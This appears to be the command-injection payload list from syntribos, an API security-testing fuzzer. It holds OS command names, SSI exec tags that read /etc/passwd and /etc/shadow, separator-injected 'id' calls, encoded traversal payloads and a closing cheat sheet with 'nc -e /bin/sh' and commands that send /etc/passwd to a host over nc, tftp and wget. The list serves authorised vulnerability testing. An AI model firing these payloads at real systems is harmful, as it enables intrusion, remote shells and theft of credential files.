syntribos/data/os-cmd-execution.txt


alias
alloc
apropos
awk
basename
bash
bg
bind
bless
break
builtin
bzip
cal
caller
case
cat
cd
chflags
chgrp
chmod
chown
chroot
cksum
clear
cmp
comm
command
complete
continue
cp
cron
crontab
curl
cut
date
dc
dd
declare
defaults
df
diff
diff3
dig
dirname
dirs
diskutil
disown
ditto
dot_clean
drutil
dscacheutil
dscl
du
echo
ed
enable
env
eval
exec
exit
expand
expect
export
expr
false
fc
fdisk
fg
file
find
fmt
fold
for
fsck
fsaclctl
fs_usage
ftp
GetFileInfo
getopt
getopts
goto
grep
groups
gzip
hash
head
hdiutil
history
hostname
id
if
info
install
jobs
join
kextfind
kickstart
kill
l
last
launchctl
ll
less
let
lipo
ln
local
locate
logname
login
logout
lpr
lprm
lpstat
ls
lsregister
lsbom
lsof
man
mdfind
mdutil
mkdir
mkfifo
more
mount
mv
net
netstat
networksetup
nice
nohup
ntfs.util
onintr
open
opensnoop
osacompile
osascript
passwd
paste
pbcopy
pbpaste
pico
ping
pkgutil
plutil
pmset
popd
pr
printenv
printf
ps
pushd
pwd
quota
rcp
read
readonly
reboot
return
rev
rm
rmdir
rpm
rsync
say
screen
screencapture
sdiff
security
sed
select
set
setfile
shift
shopt
shutdown
sips
sleep
softwareupdate
sort
source
split
stop
su
sudo
sum
suspend
sw_vers
system_profiler
systemsetup
tail
tar
tee
test
textutil
time
times
top
touch
tr
trap
traceroute
true
tty
type
ufs.util
ulimit
umask
umount
unalias
uname
unexpand
uniq
units
unset
until
users
uuencode
uudecode
uuidgen
uucp
vi
wait
wc
whatis
where
which
while
who
whoami
write
xargs
yes
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
a
arp
assoc
at
atmadm
attrib
bootcfg
break
cacls
call
change
chcp
chdir
chkdsk
chkntfs
cipher
cls
cmd
cmstp
color
comp
compact
convert
copy
cprofile
cscript
date
defrag
del
dir
diskcomp
diskcopy
diskpart
doskey
driverquery
echo
endlocal
eventcreate
eventquery
eventtriggers
evntcmd
exit
expand
fc
filter
find
findstr
finger
flattemp
for
format
fsutil
ftp
ftype
getmac
goto
gpresult
gpupdate
graftabl
help
helpctr
hostname
if
ipconfig
ipseccmd
ipxroute
irftp
label
lodctr
logman
lpq
lpr
macfile
mkdir
mmc
mode
more
mountvol
move
msiexec
msinfo32
nbtstat
net
netsh
netstat
nslookup
ntbackup
ntcmdprompt
ntsd
openfiles
pagefileconfig
path
pathping
pause
pbadmin
pentnt
perfmon
ping
popd
print
prncnfg
prndrvr
prnjobs
prnmngr
prnport
prnqctl
prompt
pushd
query
rasdial
rcp
recover
reg
regsvr32
relog
rem
rename
replace
rexec
rmdir
route
rsh
rsm
runas
sc
schtasks
secedit
set
setlocal
shift
shutdown
sort
start
subst
systeminfo
sfc
taskkill
tasklist
tcmsetup
telnet
tftp
time
title
tracerpt
tracert
tree
type
typeperf
unlodctr
ver
verify
vol
vssadmin
w32tm
winnt
winnt32
wmic
xcopy
ver
chdir
echo %USERNAME%
accept
access
aclocal
aconnect
acpi
acpi_available
acpid
addr2line
addresses
agetty
alsactl
amidi
amixer
anacron
aplay
aplaymidi
apm
apmd
apropos
apt
ar
arch
arecord
arecordmidi
arp
as
at
atd
atq
atrm
audiosend
aumix
autoconf
autoheader
automake
autoreconf
autoscan
autoupdate
badblocks
banner
basename
bash
batch
bc
biff
bison
bzcmp
bzdiff
bzgrep
bzip2
bzless
bzmore
c++
cal
cardctl
cardmgr
cat
cc
cdda2wav
cdparanoia
cdrdao
cdrecord
cfdisk
c++filt
chage
chattr
chfn
chgrp
chkconfig
chmod
chown
chpasswd
chroot
chrt
chsh
chvt
cksum
clear
cmp
col
colcrt
colrm
column
comm
compress
cp
cpio
cpp
crond
crontab
csplit
ctags
cupsd
cut
cvs
date
dd
deallocvt
debugfs
depmod
devdump
df
diff
diff3
dig
dir
dircolors
dirname
disable
dlpsh
dmesg
dnsdomainname
dnssec-keygen
dnssec-makekeyset
dnssec-signkey
dnssec-signzone
doexec
domainname
dosfsck
du
dump
dumpe2fs
dumpkeys
e2fsck
e2image
e2label
echo
edquota
egrep
eject
elvtune
emacs
enable
env
envsubst
esd
esdcat
esd-config
esdctl
esddsp
esdmon
esdplay
esdrec
esdsample
etags
ex
expand
expr
factor
false
fc-cache
fc-list
fdformat
fdisk
fetchmail
fgconsole
fgrep
file
find
finger
fingerd
flex
fmt
fold
formail
free
fsck
ftp
ftpd
fuser
g++
gawk
gcc
gdb
getent
getkeycodes
gpasswd
gpg
gpgsplit
gpgv
gpm
gprof
grep
groff
groffer
groupadd
groupdel
groupmod
groups
grpck
grpconv
gs
gunzip
gzexe
gzip
halt
hdparm
head
hexdump
host
hostid
hostname
htdigest
hwclock
iconv
id
ifconfig
imapd
inetd
info
init
insmod
install
ipcrm
ipcs
iptables
iptables-restore
iptables-save
isodump
isoinfo
isosize
isovfy
ispell
join
kbd_mode
kbdrate
kernelversion
kill
killall
killall5
klogd
kudzu
last
lastb
lastlog
ld
ldconfig
ldd
less
lesskey
lftp
lftpget
link
ln
loadkeys
locale
locate
lockfile
logger
login
logname
logrotate
look
losetup
lpadmin
lpinfo
lpmove
lpq
lpr
lprm
lpstat
ls
lsattr
lsmod
lspci
lsusb
m4
mail
mailq
mailstats
mailto
make
makedbm
makemap
man
manpath
mattrib
mbadblocks
mcat
mcd
mcopy
md5sum
mdel, mdeltree
mdir
mdu
merge
mesg
metamail
metasend
mformat
mimencode
minfo
mkdir
mkdosfs
mke2fs
mkfifo
mkfs
mkfs.ext3
mkisofs
mklost+found
mkmanifest
mknod
mkraid
mkswap
mktemp
mlabel
mmd
mmount
mmove
modinfo
modprobe
more
mount
mountd
mpartition
mpg123
mpg321
mrd
mren
mshowfat
mt
mtools
mtoolstest
mtype
mv
mzip
named
namei
nameif
netstat
newaliases
newgrp
newusers
nfsd
nfsstat
nice
nm
nohup
nslookup
nsupdate
objcopy
objdump
od
openvt
passwd
paste
patch
pathchk
perl
pidof
ping
pinky
pmap
portmap
poweroff
pppd
pr
praliases
printenv
printf
ps
ptx
pwck
pwconv
pwd
python
quota
quotacheck
quotaoff
quotaon
quotastats
raidstart
ramsize
ranlib
rarpd
rcp
rdate
rdev
rdist
rdistd
readcd
readelf
readlink
reboot
reject
rename
renice
repquota
reset
resize2fs
restore
rev
rexec
rexecd
richtext
rlogin
rlogind
rm
rmail
rmdir
rmmod
rndc
rootflags
route
routed
rpcgen
rpcinfo
rpm
rsh
rshd
rsync
runlevel
rup
ruptime
rusers
rusersd
rwall
rwho
rwhod
sane-find-scanner
scanadf
scanimage
scp
screen
script
sdiff
sed
sendmail
sensors
seq
setfdprm
setkeycodes
setleds
setmetamode
setquota
setsid
setterm
sftp
sh
sha1sum
showkey
showmount
shred
shutdown
size
skill
slabtop
slattach
sleep
slocate
snice
sort
split
ssh
ssh-add
ssh-agent
sshd
ssh-keygen
ssh-keyscan
stat
statd
strace
strfile
strings
strip
stty
su
sudo
sum
swapoff
swapon
sync
sysctl
sysklogd
syslogd
tac
tail
tailf
talk
talkd
tar
taskset
tcpd
tcpdump
tcpslice
tee
telinit
telnet
telnetd
test
tftp
tftpd
time
tload
tmpwatch
top
touch
tr
tracepath
traceroute
troff
true
tset
tsort
tty
tune2fs
tunelp
ul
umount
uname
uncompress
unexpand
unicode_start
unicode_stop
uniq
uptime
useradd
userdel
usermod
users
usleep
uudecode
uuencode
uuidgen
vdir
vi
vidmode
vim
vmstat
volname
w
wall
warnquota
watch
wc
wget
whatis
whereis
which
who
whoami
whois
write
xargs
xinetd
yacc
yes
ypbind
ypcat
ypinit
ypmatch
yppasswd
yppasswdd
yppoll
yppush
ypserv
ypset
yptest
ypwhich
ypxfr
zcat
zcmp
zdiff
zdump
zforce
zgrep
zic
zless
zmore
znew
uname -n -s
whoami
pwd
last
cat /etc/passwd
ls -la /tmp
ls -la /home
ping -i 30 127.0.0.1
ping 127.0.0.1
ping -n 30
get-acl
set-acl
get-alias
import-alias
new-alias
set-alias
get-authenticodesignature
set-authenticodesignature
set-location
get-childitem
get-command
measure-command
trace-command
add-content
get-content
set-content
clear-content
convertto-html
convertfrom-securestring
convertto-securestring
clear-host
clear-item
copy-item
get-credential
get-childitem
get-date
set-date
remove-item
do
get-psdrive
new-psdrive
remove-psdrive
get-eventlog
get-executionpolicy
set-executionpolicy
export-alias
export-clixml
export-console
export-csv
invoke-expression
exit
foreach-object
foreach
for
format-custom
format-list
format-table
format-wide
get-item
get-childitem
get-help
add-history
get-history
invoke-history
get-host
clear-host
read-host
write-host
if
import-clixml
import-csv
get-item
invoke-item
new-item
remove-item
set-item
clear-itemproperty
copy-itemproperty
get-itemproperty
move-itemproperty
new-itemproperty
remove-itemproperty
rename-itemproperty
set-itemproperty
stop-process
get-location
pop-location
push-location
set-location
add-member
get-member
move-item
compare-object
group-object
measure-object
new-object
select-object
sort-object
where-object
out-default
out-file
out-host
out-null
out-printer
out-string
powershell
convert-path
join-path
resolve-path
split-path
test-path
get-pfxcertificate
pop-location
push-location
get-process
stop-process
clear-itemproperty
copy-itemproperty
get-itemproperty
move-itemproperty
new-itemproperty
remove-itemproperty
rename-itemproperty
set-itemproperty
get-psprovider
set-psdebug
add-pssnapin
get-pssnapin
remove-pssnapin
quest
read-host
remove-item
rename-item
rename-itemproperty
run/call
select-object
get-service
new-service
restart-service
resume-service
set-service
sort-object
start-service
stop-service
suspend-service
start-sleep
switch
select-string
tee-object
new-timespan
trace-command
get-tracesource
set-tracesource
start-transcript
stop-transcript
get-uiculture
get-unique
update-formatdata
update-typedata
clear-variable
get-variable
new-variable
remove-variable
set-variable
where-object
where
while
get-wmiobject
write-debug
write-error
write-output
write-progress
write-verbose
write-warning
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
+|+Dir+c:\
$+|+Dir+c:\
%26%26+|+dir c:\
$%26%26dir c:\
%0a+dir+c:\
+|+Dir+c:%255c
$+|+Dir+c:%255c
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%0a+dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:%2f
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\
Executing Commands
Separating Commands:
blah;blah2
Pipes / cmd.exe escape character (^):
blah ^ blah2
AND:
blah && blah2
OR:
FAIL || X
Carriage-return (%0D) separator:
blah%0Dblah2%0Dblah3
Backtick:
`blah`
Background:
`blah & blah2`
Getting Files / Data
FTP:
Write the FTP commands to a text file with echo, then redirect that file into the ftp client as its input
NC:
nc -e /bin/sh
NC:
echo /etc/passwd | nc host port
TFTP:
echo put /etc/passwd | tftp host
WGET:
wget --post-file /etc/passwd